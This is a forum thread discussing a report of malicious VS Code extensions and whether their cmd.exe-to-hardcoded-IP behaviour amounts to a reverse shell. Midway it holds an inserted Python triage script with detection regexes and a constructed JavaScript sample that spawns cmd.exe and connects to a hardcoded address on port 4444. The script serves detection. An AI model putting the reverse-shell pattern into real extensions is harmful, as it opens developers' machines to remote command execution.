Malicious VSCode extensions with millions of installs discovered

floofloof@lemmy.ca to Programming@programming.dev – 234 points –
bleepingcomputer.com


Their findings included an extension that opens an obvious reverse shell.

They made the extensions themselves.
If you are talking about the other reverse shell, it hit a local IP address.

True, it’s a private (not local) IP. It could easily have connected to a remote system, as their proof-of-concept did.

This code execs cmd.exe and pipes output to and from a hardcoded IP. That’s pretty weird. What’s running on that IP? How does the extension know something is there?

It looks like VS Code has no review — human or automated — or enforced entitlement system that would have stopped this or at least had someone verify it was legit.

Thing is, tons of code extensions have an RCE in one form or another, but they always hit localhost or a configurable IP. How did their automated analysis make any difference?
Tons of extensions summon cmd to summon the language devtools; their automated analysis flagged tons of packages and they inferred millions of infeections from that.
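
One way an automated triage pass could tell the benign case apart (cmd spawned for a language server that talks to loopback) from the pattern the thread describes (cmd spawned alongside a hardcoded private or public address), as an added example that is not from the thread, the article or any extension: the regexes, the sample extension source and the address 10.20.30.40 are constructed for illustration.

```python
import ipaddress
import re

# Constructed sample of a packed extension's JavaScript (not real extension code).
# It mixes a legitimate devtools launch on loopback with a spawn of cmd.exe next
# to a hardcoded private address, the combination the thread is discussing.
SAMPLE_EXTENSION_JS = r"""
const cp = require('child_process');
const net = require('net');
const lsp = cp.spawn('cmd.exe', ['/c', 'dotnet', 'lsp', '--port', '127.0.0.1:9000']);
const sock = net.connect(4444, '10.20.30.40');   // hardcoded, not configurable
const proc = cp.spawn('cmd.exe');                // stdio would be piped to sock
"""

IPV4_LITERAL = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# child_process call whose first argument is the Windows command interpreter
SPAWN_CMD = re.compile(r"\b(?:spawn|exec|execSync|spawnSync)\s*\(\s*['\"]cmd(?:\.exe)?['\"]")


def classify_ip(text):
    """Return 'loopback', 'private', 'public' or 'invalid' for a dotted-quad string."""
    try:
        ip = ipaddress.ip_address(text)
    except ValueError:
        return "invalid"
    if ip.is_loopback:          # checked first: 127.0.0.0/8 is also 'private'
        return "loopback"
    if ip.is_private:           # RFC 1918 and friends: on-net, but not this machine
        return "private"
    return "public"


def triage(source):
    """Classify every IPv4 literal in the source and flag cmd spawns that sit
    next to a non-loopback literal; loopback-only devtools launches pass."""
    ips = {m.group(0): classify_ip(m.group(0)) for m in IPV4_LITERAL.finditer(source)}
    spawns_cmd = bool(SPAWN_CMD.search(source))
    offsite = sorted(ip for ip, kind in ips.items() if kind in ("private", "public"))
    return {
        "ips": ips,
        "spawns_cmd": spawns_cmd,
        "offsite_ips": offsite,
        "suspicious": spawns_cmd and bool(offsite),
    }


if __name__ == "__main__":
    print(triage(SAMPLE_EXTENSION_JS))
```

A configurable endpoint read from settings would produce no literal and so would not trip this check, which is exactly the distinction the comment above draws.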

infeections

Since I read this I can't stop picturing you as Peter Lorre lmao.

Damn, now I noticed I made tons of mistakes/typos there ^^'.